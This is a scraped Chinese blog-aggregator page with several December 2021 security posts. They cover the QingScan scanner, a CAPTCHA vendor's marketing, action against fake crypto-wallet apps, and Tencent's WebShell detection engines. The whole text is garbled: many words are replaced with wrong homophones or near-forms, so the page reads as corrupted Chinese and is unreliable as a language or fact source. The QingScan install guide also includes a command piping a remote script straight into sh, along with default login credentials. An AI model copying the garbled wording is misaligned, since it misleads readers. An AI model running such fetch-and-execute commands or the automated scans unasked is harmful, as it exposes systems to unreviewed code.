关于安全:QingScan漏洞扫描器初体验

一、背景最近在几个微信群里看到好些人在探讨这个QingScan扫描器,听他们聊得炽热我也去GitHub上看了看,GitHub的介绍说汇合了各类平安工具,只须要输出一个URL,便会主动调用近30款平安工具对指标进行扫描,于是我下载了一个试试成果咋样 我的项目地址:https://github.com/78778443/QingScan 二、 开启插件依照提醒装置实现后,用浏览器拜访http://ip:8000/ ,默认账号密码test1 123456, 进入零碎设置→守护过程治理,进入后关上本次想要应用的插件,据说这个性能是因为插件太多了,全开启电脑CPU会十分高,我开启了我所须要的一些插件。开启所须要的插件,接下来去增加URL让它主动扫描 三、 增加扫描点击黑盒扫描→增加,输出“利用名称,URL地址”,须要登陆扫描的就是输出账号和明码,不须要则不必填,其余默认就好,点击提交,会主动进行扫描。 四、查看扫描后果点击“查看详情”去查看破绽详细信息,能够看到app信息、指纹识别、子域名等等.......,下图是我的项目的app信息、whatweb指纹识别、子域名、主机暴力破解、扫后盾、SQL注入、vulmap破绽,如下图所示: 4.1 nmap点击信息收集→nmap列表,查问到了以后主机所凋谢了哪些端口以及对应的服务名称点击信息收集→主机列表,主机列表会自动检测IP所在地址国家、省份 4.2 指纹识别点击信息收集→whatweb列表,能够看到各个我的项目的指纹信息。 4.3 URL爬虫点击黑盒扫描→URL列表,能够看见爬虫爬取到的url。 4.4 SQLMap点击黑盒扫描→SqlMap列表,sqlmap会依据URL列表里的链接去扫描,将有破绽的链接展现在下图。 4.5 Xray点击黑盒扫描→Xray列表,能够看见Xray扫出来的破绽。 四、总结信息收集和黑盒扫描曾经测试的差不多了,总体来说QingScan的确很不便,我只输出了URL,他会帮我去调用各种工具,这一点几乎不要太爽,就像有人将他的浸透教训通过这种形式传递给你,有一说一,这个界面展现成果做的切实是不太好看。 作者:婷婷的橙子日期:2021年12月12日

December 12, 2021 · 1 min · jiezi

关于安全:QingScan扫描器安装使用

一、 QingScan介绍QingScan是一个平安工具整合系统,解决你平时应用各种工具一个个打 开填写扫描指标的麻烦过程;QingScan工具只须要你把URL给它,它会调 用市面上各种扫描工具,对URL扫描,最初把后果汇聚展现 我的项目地址:[https://github.com/78778443/Q...](https://github.com/78778443/Q...) 文档地址:http://wiki.qingscan.songboy.site/2559367 对于QingScan性能大体分为四个方向,信息收集,黑盒扫描,白盒审计,POC利用,共计集成了28款插件,除了下图的内容,还有nmap、fofa等等未展现在思维导图内。 二、 装置QingScan1、 dockers官网下载地址:curl -sSL https://get.daocloud.io/docker | sh 2、 装置composer管理工具curl -L https://get.daocloud.io/docker/compose/releases/download/1.25.1/docker-compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-compose 增加可执行权限: chmod +x /usr/local/bin/docker-compose3、下载QingScani源码:https://github.com/78778443/QingScan4、拉取镜像并主动启动我的项目:cd QingScan/docker/20211014_01 && docker-compose up5、通过浏览器去拜访ip:8000 三、应用教程默认账号test1 明码123456 本程序设置了一个总开关,默认为开启状态,相似与家里的总闸,地位为qing-scan/code/.env, 1、管制单个插件开关在零碎设置→守护过程列表,这里能够管制单个插件是否启动。 2、增加扫描工作在黑盒

December 10, 2021 · 1 min · jiezi

关于安全:适老化和无障碍渐成数字业务标配顶象无感验证助力企业合规

摘要:自工信部发动互联网利用适老化及无障碍革新专项口头近一年以来,适老化革新已初步实现。比方浏览新闻更轻松、线上购物更简略、购票打车更省心。然而作为互联网利用身份辨认的第一道坎,“验证码”的适老化和无障碍革新怎么样了呢? 以后,随着数字经济以及智能化时代的减速推动,数字科技、数字文化一度成为咱们引以为傲的资本,因为这代表着新的技术、新的倒退,也代表着咱们这个时代的提高。然而,随同着疫情的冲击,让咱们粗浅感触到在数字科技富丽表面下暗藏着的,是一群被“数字经济”回绝和摈弃的人。他们就是“老年人”,他们不懂得应用智能手机,更不会应用挪动终端来享受数字科技带来的便当。 “衰弱码、挪动领取、人脸识别”,这些随同新冠疫情而呈现的罕用利用,以及日常生活中罕用到的“扫码点餐、小程序挂号、App打车”等,对于老年人成为了不可逾越的数字鸿沟。而作为挪动互联网利用身份辨认的第一道关卡,“验证码”的适老化和无障碍革新,尤其摆到了“显要”窗口。 适老化和无障碍已成为数字利用“标配”依据2021年第七次全国人口普查结果显示,中国60岁及以上人口占18.70%,其中,65岁及以上人口占13.50%。60岁及以上人口的比重回升5.44个百分点,65岁及以上人口的比重回升4.63个百分点,人口老龄化水平进一步加深。而第48次《中国互联网络倒退情况统计报告》显示,截至2021年6月,60岁及以上网民占比为12.2%,较2020年6月增长1.9个百分点。随着老年群体规模的不断扩大,其在网民中所占比例将进一步提高。 验证码的适老化和无障碍革新越来越具备紧迫性。一方面,越来越多老年人退出网民大军,享受挪动互联网带来的生存便当;另一方面,越来越多的公共服务从线下搬到线上,对老年人纯熟应用手机提出更高要求,凸显了挪动互联网适老化革新工作的必要性和迫切性。 **为此,从国家层面,近一年内密集出台了多项政策措施: 2020年11月24日,国务院办公厅印发《对于切实解决老年人使用智能技术艰难的实施方案》,旨在进一步推动解决老年人在使用智能技术方面遇到的艰难,让老年人更好共享信息化倒退成绩。 2020年12月24日,工业和信息化部印发《互联网利用适老化及无障碍革新专项口头计划》,计划决定自2021年1月起,在全国范畴内组织发展为期一年的互联网利用适老化及无障碍革新专项口头。 2021 年 2 月,工业和信息化部公布《对于切实解决老年人使用智能技术艰难便当老年人应用智能化产品和服务的告诉》,明确发展适老化工作的总体要求和重点工作。 2021 年 4 月,工业和信息化部公布《互联网网站适老化通用设计规范》和《挪动互联网利用(APP)适老化通用设计规范》,在服务准则、技术要求等方面进行了具体的要求,为中老年网民更加深刻地融入互联网生存,共享互联网红利发明了便当条件。其中特地提到,如果挪动利用中存在非文本验证码(如拼图类、选图类验证形式)等老年人不易了解的验证形式,则应提供可被不同类型感官(视觉、听觉等)承受的代替表现形式,例如文字或语音模式,以适应老年人的应用需要。 2021年10月20日,工业和信息化部、民政部、国家卫生衰弱委联结印发《智慧衰弱养老产业倒退行动计划(2021-2025年)》,提出要切实改善老年人在应用互联网服务的体验,激励企业提供相干利用的“关心模式”“前辈模式”;同时强调要深刻施行“智慧助老”口头。2021年11月5日。地方网络安全和信息化委员会印发《全民数字素养与技能口头大纲》,提出要依靠老年大学、凋谢大学、养老服务机构、残疾人服务机构、社区教育机构、老科协等,丰盛体验学习、尝试利用、经验交流、互助帮扶等老年人、残疾人数字技能培训模式和内容。 2021年11月18日,中共中央 国务院公布《对于增强新时代老龄工作的意见》,提出要在激励推广新技术、新形式的同时,保留老年人相熟的传统服务形式,放慢推动老年人罕用的互联网利用和挪动终端、APP利用适老化革新;施行“智慧助老”口头,增强数字技能教育和培训,晋升老年人数字素养。 满足老龄人和无障碍群体应用是迫切需要依据工业和信息化部印发的《互联网利用适老化及无障碍革新专项口头计划》中指出,信息无障碍是指通过信息化伎俩补救身材机能,所处环境等的差别,使任何人(无论健全人还是残疾人,无论年轻人还是老年人)都可能平等、平安、不便的获取、交互、应用信息。在《对于推动信息无障碍领导意见》中明确将老年人、残疾人、偏远地区居民以及文化差异人群归为信息无障碍重点受害群体。由此可见,适老化只是信息无障碍的一部分。 以后在金融畛域,银行宽泛应用的扫码、刷脸、手机领取,到下载注册 APP、验证身份、绑定社交账号等一系列简单的操作流程,甚至记住一个个明码,都会困住老年人。 例如近日成都一名老人用存折到银行取钱,被柜员要求须要用手机接管验证码实现实名认证。 老人说:“我有身份证,我的身份证就是证实,全国通用。”但没带手机的老人还是没能取到钱。 去年11月,有一个县城的老太太冒雨来交医保,然而柜台人员却通知她:要么刷卡,要么刷微信,不收现金。愣在当场的老人一脸的徘徊捂住,她佝偻着身子,看着本人手中的现金,眼神里全是迷茫。兴许在她的耳朵里,“刷微信”三个字就像天书一样,听都听不懂,更何况是去做到。 同样是在11月,又呈现了一位94岁的老人,她被人抱着来银行做人脸识别。新闻中,银行柜员通知记者她必须要这样做能力激活社保卡。银行服务人员做到了“人性化”服务,将老人抱上了柜台,勉强实现了流程,她们也很无奈。 适老化和无障碍革新口头正在热火朝天开展。哪些产品是无障碍革新的对象,根据顶象验证码团队剖析,次要分为以下两类: 一是老年人和阻碍群体的专用产品。常见的有针对日常生活需要的养生类、衰弱类以及生存工具类,以及其满足精力生存需要的老年大学、老年娱乐等。二是普适性产品。此类产品是市场上占比最多,且少数没有特定的目标群体。比方,罕用的社交软件、手机领取、网上银行、网上购物以及内容消费类产品。其中老年群体具备高增速、高用户基数以及低触网率的数字利用基本特征,因而适老化革新是此类产品挖掘“银发经济”,实现用户规模增长的重要途径。目前依据政府重点工作批示,首批优先推动新闻资讯、社交通信、生存购物、金融服务、游览出行、医疗衰弱等 6 大类、共 43 个 APP 进行适老化及无障碍革新。 顶象无感验证助力业务适老化和无障碍降级作为国内当先的业务平安公司,顶象智能验证码联合了设施指纹、行为特色、拜访频率、地理位置等多项信息,无效的拦挡歹意登录、批量注册,阻断机器操作,拦挡非正常用户,较传统验证码相比,用户无需再通过思考或输出操作,只需微微一滑即可进行验证。通过智能甄别为失常的用户,在肯定工夫内无需再进行滑动操作,既为企业提供了平安保障也让用户无感知通过,极大晋升用户体验。 以后在适老化和无障碍革新大趋势下,顶象无感验证良好满足适老化和无障碍的需要。 一是验证降级。将体验蹩脚的传统字符验证码进行降级替换为更容易被用户承受的滑块验证,并反对配适合老化工具或浏览器进行对立放大,大幅用户老年用户体验。二是感官验证。顶象无感验证提供基于不同感官的验证形式,满足老年人和残障人士在不同场景上应用时的优化诉求。例如,语音验证能够作为滑块验证等视觉验证形式的备选优化,面向视觉阻碍群体,能够通过语音的形式进行验证。三是深度无障碍验证。顶象无感验证可能智能剖析与事后断定操作者是非法用户还是仿冒者,对于非法用户,免验证即通过;对于异样用户,依据潜在危险等级进行二次验证或间接拦挡,实现对老年人和非凡群体的无打搅。 某企业的易用性与安全性实际某企业业务中面临三方面挑战,即用户体验差、账号安全性弱、虚伪注册账号多。 客户体验差。一些老年用户输出传统图形验证码时,常常输错,导致帐号被锁进而引起投诉。账号安全性弱。局部用户反馈,受到异地登录、账号平安有余的警示。虚伪账号注册多。企业在组织的促销流动,吸引来少量虚伪注册账号。该企业部署了顶象无感验证,良好满足老龄人群操作验证便捷体验,进一步晋升账户安全性。同时,无效防控歹意的虚伪账号注册,某一渠道单日拦挡机器拜访近百万次。 顶象是国内当先的业务平安公司,自主研发了全链路的风控中台产品矩阵体系,包含设施指纹、无感验证、实时决策平台、端加固、数据采集爱护、工业零碎爱护、模型平台、关联网络平台、常识图谱等风控、平安和人工智能产品,无效保障了企业的业务利用和基础设施平安。截至目前,已为10多个行业2000多家企业提供业余服务。下一步,顶象将着力解决老年人及非凡群体在应用互联网和智能技术时遇到的艰难,同时满足企业的业务平安与用户的体验。

December 10, 2021 · 1 min · jiezi

关于安全:分析|拥有11种验证方式的顶象无感验证不仅省钱还省时

验证码“作为人机交互界面经常出现的元素,其本质是为了避免用户利用机器人程序主动注册、登录、歹意投票、发送垃圾邮件、歹意尝试明码等登陆尝试,保障网络安全。” 据统计,寰球所有人每天须要填写2亿个验证码。而输出一次验证码大略10秒,那全人类每天在验证码上破费50多万个小时。顶象智能无感验证,11种验证形式不仅省钱还能够省时。 技术推动验证码一直改革2000年之前,验证码并不存在。随着垃圾邮件、批量评论、歹意信息以及脚本的呈现,过后最大的电子邮箱和新闻网站雅虎深受其害,于是分割到了卡内基梅隆大学的计算机科学系来寻求帮忙,心愿可能“无效分清真人用户和机器”。 卡内基梅隆大学一名21岁的学生路易斯·冯·安恩(Luis Von Ahn)针对这个目标有了思路:要让注册的用户提供“证据”来证实本人是一个人类,例如做一些只有人类能做,而机器做不到的事件。什么事件是在过后只有人类能做而机器做不到的?答案是浏览图片。人类能够很轻松的读出图片中的信息,但过后的机器并没有这样的能力。如果通过程序来提供一些稍加扭曲的图片,而后让注册者答复图片中的内容,便能很轻易地将机器拒之门外。 这正是即便在当初咱们也很常看到的验证码模式之一。 2002年左右,这名学生路易斯·冯·安恩创造了验证码这一概念,他将其命名为CAPTCHA。CAPTCHA是Completely Automated Public Turing test to tell Computers and Humans Apart的简写,意为“全自动辨别计算机和人类的图灵测试”。也是从这一刻开始,一场继续数十年的,人与机器之间,围绕着图灵测试的反抗也开始了。 晚期的验证码就是网站提出一些图文,随着平安防护与破解入侵两方面的抗衡日益降级,验证码的难度在减少,模式也在多样化。从简略的字母数字、算术题,到扭曲的字符、含糊的图片。 随着人工智能技术的倒退,特地是大数据推动下的人工智能技术的倒退,曾经使得机器的感知能力达到甚至超过了人类的程度,这个技术趋势的间接后果就是基于感知能力的人机验证的形式未然生效。机器在某些方面的感知能力方面曾经达到甚至超过了人类程度。比方微软在图像识别方面的准确率达到 96.43%,高于人类 94.9%的辨认度。攻击者在利用人工智能技术自动化破解验证码,由此给企业带来新的危险挑战。 验证码的设立很大水平上是为了反抗高频的暴力破解,阻挡非法的操作,所以验证码本身的安全性十分必要的。以顶象无感验证为代表的产品,充分考虑了验证码安全性和操作便捷性需要,不再依赖繁多维度进行验证,而是依据操作者环境进行智能剖析与综合判断,不仅保障验证码的安全性,更晋升了用户的体验,实现了易用性与安全性的均衡。 顶象无感验证的11种验证形式顶象无感验证反对Android、iOS、Web(H5)、微信小程序等,满足业务多平台须要。通过数据分析和人工智能判断,升高验证码遭破解的可能,保障业务的平安;通过进步免验群体,免去失常用户分别验证码、操作验证码的苦恼,晋升用户体验。 当操作者进入服务后,顶象无感验证首先对设施、行为、频率、网络环境等综合剖析,而后给出综合后果断定,如果断定是非法用户则免验证,间接放行;如果断定为异样用户,则依据危险呈现相应验证内容,要求操作者进行二次验证。 具体来看,顶象无感验证领有11种验证形式: 智能随机验证: 依据操作者可疑水平,调用对应难度的验证形式。平安用户无感知通过,晋升体验,升高散失。援用滑动拼图验证:智能人机辨认,微微一滑即可实现验证。援用文字点选验证:平安用户依序点击文字即可实现验证。援用图标点选验证:依照指定程序点击正确的图标,即可实现验证。援用语序点选验证:需依照常用语的程序点击正确的文字,即可实现验证。援用刮刮卡验证:需刮开残缺指定图案,即可可通过验证。援用空间语义验证:需依照提示信息点击正确的内容,即可实现验证。援用乱序拼图验证:需拖动图块将乱序的图片还原为正确,即可实现验证。援用旋转验证:拖动图块将图片旋转还原为正确,即可实现验证。援用面积验证:需点击面积最大的区域,即可实现验证。援用差别点击验证:需点击与其余同类型具备差别的文字或图案,即可实现验证。验证码常见的四类利用场景随着通信行业以及智能化时代的倒退,挪动利用正在出现爆发式增长。而依据中国互联网络信息中心公布的第四十八次《中国互联网络倒退情况统计报告》显示,截至往年6月,我国网民规模达10.11亿。“验证码”被广泛应用在挪动社交、挪动领取以及日常生活类、工具类等各种挪动利用及互联网产品中,不仅用于注册、登录,还是账户平安、数据保护的关键技术,是身份核验、危险防控的第一关口。 账号爱护:验证码可能无效抵挡自动机歹意注册(如利用注册机批量注册小号),防备机器注册、垃圾注册、抵挡撞库登录、暴力破解、验证账号敏感信息的批改,保障失常用户的注册、登录。某银行企业网银此前频繁受到歹意网络爬虫,试图爬取网银隐衷信息和重要数据。部署顶象智能无感验证码后,批量登陆、机器登陆升高 67%,安全性进一步加强。 营销反欺诈:营销流动是企业重要的经营伎俩。“羊毛党”频繁刷取处分,导致实在用户无奈获取处分,业务方经营流动成果降落、经济利益受损。顶象无感验证实用于抢购、秒杀、优惠券等流动场景,无效抵挡“羊毛党”疯抢本来属于用户的福利和优惠,保障营销流动价值。例如,某电商遭逢到羊毛党和垃圾注册骚扰,部署顶象无感验证后,不仅反对多个不同场景的对立风控接入和动静拓展,并可能依据客户需要为客户布局自动化建模,进步危险辨认成果。 避免刷帖刷票:歹意用户用小号在 UGC 社区歹意发帖、刷票,使经营方无奈取得实在用户反馈,影响流动发展。顶象无感验证用于论坛、投票等场景,无效抵挡自动机刷赞和水军刷帖,解决批量垃圾内容、广告导流、批量刷榜单、投票、点赞、歹意爬取外围数据与内容。某投票服务托管平台,为了解决扰乱失常经营秩序的“刷票”问题,始终在寻找和调优平台防刷票伎俩。通过顶象无感验证码业余的防刷票解决方案,无效避免不良投票、刷票、薅羊毛景象的呈现,最大限度的保障平台流动的偏心公正,保障营销流动衰弱运行和客户体验。 避免数据泄露:文章、图片、音频、视频、报告、课件、商品、评估、用户信息等数据是企业重要资产,网络爬虫的爬取盗用,不仅造成信息泄露,更给企业微小业务损失。验证码可能无效防备网络爬虫的歹意爬取行为,保障企业数字平安。在某高流量内容平台,短时间内被上传大量垃圾广告,更有甚者借此流传黄赌毒等有害信息。依靠顶象无感验证码,该内容平台无效拦挡各类垃圾广告和违禁信息的公布。 除此外,顶象无感验证还能够用于避免电商刷单炒信、避免虚伪账户注册、避免航空机票虚伪占座、避免水军刷榜刷评论等利用场景,无效预防各类欺诈行为,保障企业的业务平安。

December 10, 2021 · 1 min · jiezi

关于安全:百度安全联合慢雾打击加密货币假钱包黑产

区块链平安公司慢雾MistTrack 于 11 月 24 日公布了对于假钱包黑产的剖析报告 ——慢雾:假钱包 App 已致上万人被盗,损失高达十三亿美元,剖析报告指出,慢雾所接触的受害者里,因下载假钱包 App 被盗的就占到了 61%,其中大部分是因为用户被诱骗拜访了虚伪官网,下载安装了暗藏后门的钱包 App。百度平安团队在看到报告后高度重视此事,立刻与慢雾分割并就此事与慢雾联结打击黑产立功。 剖析报告还指出,针对找到慢雾 MistTrack 的受害者的不齐全统计,目前因下载假 App 导致资产被盗的受害者规模已有上万人,被盗金额高达十三亿美元。这还只是冰山一角。目前这种骗局流动不仅沉闷,甚至有扩大范围的趋势,每天都有新的受害者上当。 近年来黑产技术手段越来越强,模式越来越多样化,不仅侵害了宽广用户的利益,还好转了网络空间的信息和内容生态,在微小的利益驱使下,黑产浸透了国内出名下载站、各大利用商店散发病毒木马,收购了多个钱包的商标持有人取得官网受权流传不实信息。黑产立功已成为严重危害用户的毒瘤,依法严厉打击网络黑灰产势在必行。 在与慢雾团队确认相干事宜后,仅一周工夫,百度平安团队就实现了搜寻钱包只展现官网的第一轮工作。百度平安团队示意:当前加密货币钱包相干的官网上线将会通过安全部门的审核把关。 目前,百度已对 imToken、比特派、TokenPocket 等 8 个出名钱包进行了官网甄别,搜寻后将只展现官方网站,其余可能存在虚伪、欺骗等问题的后果已实现第一轮集中清理工作,百度平安还示意:将踊跃撑持公安机关溯源涉诈团伙,打击网络黑产。 ▲ 百度平安反诈治理成果如图

December 9, 2021 · 1 min · jiezi

关于安全:腾讯主机安全云镜兵器库WebShell克星TAV引擎

腾讯TAV反病毒引擎是腾讯平安的自研引擎,最后利用在腾讯电脑管家中检测革除病毒木马,反对腾讯电脑管家获得过一系列国内评测的优异成绩。年龄超过11岁的TAV反病毒引擎始终 保持与时俱进不断创新,致力于解决全新的平安课题。明天要讲的,就是腾讯TAV引擎反抗新型恶意程序WebShell的故事。 Webshell是什么?随着越来越多的政企机构将其业务和公共服务互联网化,网络应用日益遍及,网民一部手机简直能够包打天下了。产业互联网的疾速倒退,也给网络黑灰产业发明出新的舞台,WebShell就是其中之一,传统安全软件在WebShell的检测上会遇到力不从心的问题。 Webshell并不是破绽,但与破绽密切相关。从攻打角度看,能够将WebShell了解成一类攻打工具或办法,通常会联合服务器组件、利用的安全漏洞达到其入侵管制目标。 从字面了解,Web指Web服务器,而Shell是脚本程序,Webshell能够了解为针对Web服务的管理工具,能够利用WebShell工具取得Web服务器的管制管理权限。尽管能够用来实现某些治理性能,但网站经营人员失常状况下却不会采纳此类办法。所以,日常发现的WebShell根本都是黑客入侵的后果。 Webshell性能非常弱小,能够上传下载文件,查看数据库,甚至能够调用一些服务器上零碎相干命令(比方创立用户,批改删除文件之类)。攻击者用于歹意目标,可通过Web页面的上传破绽或上传权限管制不当破绽,将已编写好的Webshell文件上传到服务器上,再通过页面拜访已上传的Webshell文件便可实现歹意命令执行。 WebShell因其具备隐秘性,基于脚本、灵便便捷、功能强大、易于编写、变化多端,便于绕过传统恶意软件检测办法等等特点,已是黑客入侵攻打的绝佳武器。WebShell有PHP脚本木马、ASP脚本木马、JSP脚本木马等。在日常网络安全检测时,能够发现大量尝试上传WebShell的攻打流动,证实采纳WebShell攻打,已是黑客群体极为广泛的作法。 传统Webshell检测计划传统Webshell检测依附正则特色,但因为Webshell是纯脚本文件,无需编译,灵活性高,传统特色很容易被绕过。特地是PHP的Webshell,借助PHP灵便的语法来变形、混同绕过特色,从而令传统检测办法成果欠佳。 TAV Webshell检测引擎腾讯平安TAV的Webshell检测引擎联合传统特色、动态剖析、动静行为剖析,三管齐下,全方位无死角地检测各类Webshell。 1.动态剖析TAV引擎首先会将各种脚本语言进行词法语法分析,将其转换成一种对立的两头示意,再进行后续的剖析。TAV的动态剖析引擎反对检测PHP、JSP等各类支流脚本的Webshell。 失去两头示意后,TAV引擎会构建控制流图和数据流图,并在图上跟踪外界变量通过赋值操作、函数调用等形式的传递。操作外界变量是WebShell十分重要的特色,如果发现外界变量最终进入了命令执行函数,就能够判断为Webshell。 依附动态剖析引擎,咱们对开源社区的热门php我的项目进行了自动化代码审计,发现了数十个危险,人工确认利用后,向CNVD提交了3个破绽,并取得破绽证书。(CNVD-2021-10320,CNVD-2021-08442,CNVD-2021-51345) 2.动静行为剖析与动态剖析不同,动静行为剖析关注攻击行为的产生,TAV引擎在外部实现了一个平安精美的PHP解释器,能够将PHP WebShell在平安、稳固的前提下,虚构执行脚本,利用动静污点跟踪技术,对攻击行为进行严格检测甄别。 TAV动态分析引擎的污点技术,会监控PHP样本中读取外界参数的行为,并将所有外界传入的变量进行标记,对PHP中所有的变量传递和赋值的相干逻辑操作进行监控,实现污点流传的跟踪。最初对高危危险函数如eval,system等执行前进行拦挡,剖析其参数和具体行为,实现歹意WebShell检测。 除此之外,TAV PHP虚构执行解释器针对加密混同的样本,能够在动态分析后输入其实在的执行逻辑,将其实在的执行代码和两头示意输入到特征分析和污点剖析中,几大模块相互配合,实现当先业内的WebShell检出率,攻击者很难通过加密混同等伎俩绕过腾讯TAV 引擎检测。 TAV WebShell引擎的检测成果在云上实在WebShell黑样本集中,腾讯TAV引擎的检测贡献率能达到99%以上。相比于传统的特色检测计划,TAV WebShell检测引擎不仅有着超高的检测率,同时也有超低的误报率,在云上实在环境中,也具备较高的独报能力。 TAV WebShell引擎能力既能够利用于腾讯安全软件的本地检测引擎,也能够利用在云端服务。目前腾讯主机平安(云镜)已全面接入TAV WebShell检测能力,使腾讯云主机查杀进攻WebShell攻打的能力得以大幅晋升。后续还将陆续接入腾讯平安其余产品,比方腾讯高级威逼检测零碎(御界)、Web利用防火墙、云防火墙、零信赖iOA等等产品,将全面加强在终端侧、主机侧、流量侧的平安能力。 腾讯TAV反病毒引擎腾讯TAV反病毒引擎汇聚了腾讯平安多年来与恶意软件反抗的教训,具备高性能、高检出、高解决能力、低消耗等技术特点,极大地晋升了腾讯平安旗下终端平安产品的杀毒能力,护航亿级用户的终端平安。 TAV反病毒引擎的技术能力次要体现在自主打造增强版特色辨认技术、弱小的复合类文件解决能力、业余的脱壳技术、翻新的动静模仿检测技术、多维启发检测等五个方面。依靠腾讯平安全网海量情报数据,可能全面笼罩风行威逼,实现对全平台(Windows、Android、linux等)的威逼样本捕捉,第一工夫检测到暴发的恶意软件和破绽攻打样本。依靠大数据分析,主动进行样本聚类解决和样本行为断定,实现对海量威逼情报的特征提取和剖析。 依靠腾讯平安反病毒实验室自研的TAV反病毒引擎,腾讯平安产品在各项国内外产品评测获得优异成绩,屡次取得满分,最高评级。VB100累计50次通过,间断三年取得AV-Comparatives Top Rated 产品,29个A+评级,AV-TEST挪动平安评测间断17次满分,在国内赛可达评测更是间断屡次排名第一,平安能力取得国内外认可。 对于腾讯平安反病毒实验室腾讯反病毒实验室成立于2010年,始终致力于互联网安全防护、计算机与挪动端恶意软件检测查杀、网络威逼情报预警等工作。通过“自研引擎能力、安全事件经营、哈勃剖析平台”的“三剑合璧”,对”平安查杀能力、破绽监测能力及病毒样本剖析“提供了全面、零碎、一体化的产品经营式的标准化防护,为腾讯平安实力进一步提供了弱小技术撑持,也为网民构建了平安的上网环境。 实验室领有业余的反病毒团队,在自主反病毒引擎TAV研发上深耕多年,领有多项自主知识产权病毒检测专利。在VB100、 AV-C、AV-TEST等国内平安评测中屡次获得满分问题。 重磅举荐 腾讯主机平安旗舰版发布会将于2022年1月初召开,更多利用实例和技术解读,敬请关注腾讯平安威逼情报中心公众号更新!

December 8, 2021 · 1 min · jiezi

关于安全:腾讯安全月报|数字生态大会举办多个国际研报认可首个零信任国际标准发布……

December 2, 2021 · 0 min · jiezi

关于安全:腾讯主机安全云镜兵器库威胁分析的福尔摩斯Cyber-Holmes引擎

代号:Cyber-Holmes 在政企机构网络服务广泛上云的大背景下,攻击者继续沉闷,并采纳多样化的攻打手法对指标发动攻打,因而仅仅依赖PC时代的检测引擎是不够的。只有多种平安能力合作,梳理拼接攻打碎片,能力实现对残缺攻打事件的剖析研判。因而须要更加高效,笼罩场景更广,可能检测威逼事件全貌的平安方法论,腾讯平安威逼情报智能剖析引擎应运而生。 就像福尔摩斯探案一样,平安钻研人员首先面对的是不残缺的事件告警片断,腾讯平安部署在云端的流量或行为探针、蜜罐零碎每天获取的各类威逼事件告警信息数千万条,可疑样本文件上百万个。如此大的数据量,远远超出人工可处理的能力,同时对剖析处理引擎的性能有极高的要求,否则迅猛增长的告警和可疑样本文件会迅速拖垮零碎。 对企业平安运维人员来说,碎片化的事件告警,几乎不堪其扰:解决吧,告警不明不白无头无尾,告警的重大水平也较难评估。不解决吧,会不会有严重威胁被放过呢,而告警数量又较多,该如何下手?企业平安运维团队陷入抉择难题,在人手不足的状况下,问题放一放拖下去的可能性较大。 腾讯平安技术核心将每天数千万条告警事件抽丝剥茧,整顿出攻打脉络,对上百万的可疑样本文件进行自动化的行为剖析,找出攻击者的作案法则,主动还原网络攻击事件全过程,并对攻击者行为进行画像,其难度堪比福尔摩斯探案。将海量的平安告警数据化繁为简、化未知为已知,是威逼情报智能剖析引擎的根本任务。 腾讯平安技术核心给这一整套智能引擎外部代号取名为“Cyber-Holmes“,寓意“网络空间威逼神探”。“Cyber-Holmes“引擎,已成腾讯平安剖析、关联威逼事件的发动机。 Cyber-Holmes引擎总览 腾讯平安Cyber-Holmes引擎基于腾讯云端平安告警数据和腾讯平安常识图谱,集成若干种威逼剖析检测引擎与事件自动化考察引擎的能力,提供威逼告警与可疑样本智能剖析服务。 引擎底层为数据层,汇聚上报威逼事件告警和危险文件;中间层为威逼检测与威逼剖析模块,提供多维度的告警检测与自动化的事件剖析能力。Cyber-Holmes引擎将威逼检测与威逼剖析能力输入给腾讯平安全系列产品应用。 腾讯平安Cyber-Holmes引擎可利用于腾讯平安企业级、生产级平安产品的后端反对,目前已接入多个云原生平安产品:接入腾讯主机平安(云镜)后,间接推动了云原生预警系统的开发利用。接入腾讯云平安经营核心(云SOC),创造性的推出威逼考察性能,客户通过登录腾讯云SOC,可全面检视威逼事件的工夫线,并对威逼事件进行一键处理。 数据层 腾讯平安Cyber-Holmes引擎的数据层接入端包含腾讯平安在云端部署的流量或行为探针、蜜罐零碎;腾讯平安产品捕获的平安告警事件、云主机告警数据、可疑流量剖析、可疑过程剖析,以及第三方开源威逼情报数据,并应用腾讯平安自研的常识图谱零碎与可解释知识库合并参加实时剖析计算。 引擎层 引擎层蕴含两大模块: 1.威逼检测模块 次要利用攻打武器检测技术、实时流剖析检测技术、未知威逼剖析检测技术笼罩攻打的三种类型,别离是已知攻打、带有特色的攻打、未知新型攻打。具备多类已知威逼与未知威逼的检测能力。 攻打武器检测技术是对已知攻击者应用过的攻打武器建设特色,作为检测未知威逼时的一种检测办法。以后武器攻打规定命中某个可疑事件时,就可判断该事件疑似具备某种攻击能力。联合其余检测办法的后果,综合评估某威逼告警或样本文件的最终性质。(例如:远控等具备已知攻打武器特色的威逼检测。) 实时流剖析检测技术是对可疑行为链进行实时预警与处理。通过在腾讯云主机部署威逼流量和行为探针、蜜罐捕获可疑威逼事件,威逼探针会捕获可疑过程、过程链及高危命令。通过实时流剖析检测威逼事件或提取危险样本做进一步检测剖析。(例如:利用confluence近程代码执行破绽发动的多起攻打,均被腾讯平安捕捉,已实现实时检测预警。) 未知威逼剖析检测技术是对未知威逼的复盘检测,通过周期性复盘可疑行为特色与文件特色的数据量变化趋势,辨别失常操作与攻击者操作,实现攻打暴发前提前感知新型攻打。(例如:胜利预警YAPI近程代码执行-0DAY在朝利用) 威逼检测模块蕴含三种检测技术 2.威逼剖析模块 次要利用威逼情报与图谱关联定性技术、入侵路径分析技术、入侵行为画像技术笼罩攻打溯源的三个阶段,别离是溯源遭逢何种攻打被谁攻打,攻击者如何发动的攻打,攻击者理论造成那些影响,具备威逼自动化溯源剖析能力。 威逼关联定性分析基于威逼情报中经营的精准威逼家族与常识图谱关联的家族数据对攻击行为进行分类定性,可实现攻打自动化分类定性。 入侵路径分析技术基于专家教训制订的全局溯源门路,串联可疑文件与行为自动化生成可疑的入侵门路与横移门路。 入侵行为画像技术将威逼事件中各个行为归类并主动映射到MITRE ATT&CK 中的攻击者行为映射表,用以判断攻击者流动影响到哪些阶段,各阶段具体应用了什么攻打技巧。 威逼剖析模块蕴含三种剖析技术 腾讯平安Cyber-Holmes引擎7×24小时不间断无人值守运行,Cyber-Holmes引擎已申请相干专利十余项,剖析归因沉闷病毒黑产家族1922个,该引擎已是形成腾讯平安中台能力的基石引擎。其能力目前已接入腾讯主机平安(云镜)、腾讯云平安经营核心(云SOC),性能体现为云原生预警系统和威逼事件调查能力,Cyber-Holmes引擎将继续接入腾讯更多企业级、生产级平安产品,服务于整体客户。 重磅举荐 腾讯主机平安旗舰版发布会将于2022年1月初召开,更多利用实例和技术解读,敬请关注腾讯平安威逼情报中心公众号更新!

December 1, 2021 · 1 min · jiezi

关于安全:国际研报腾讯安全天御风控亚太排名第一
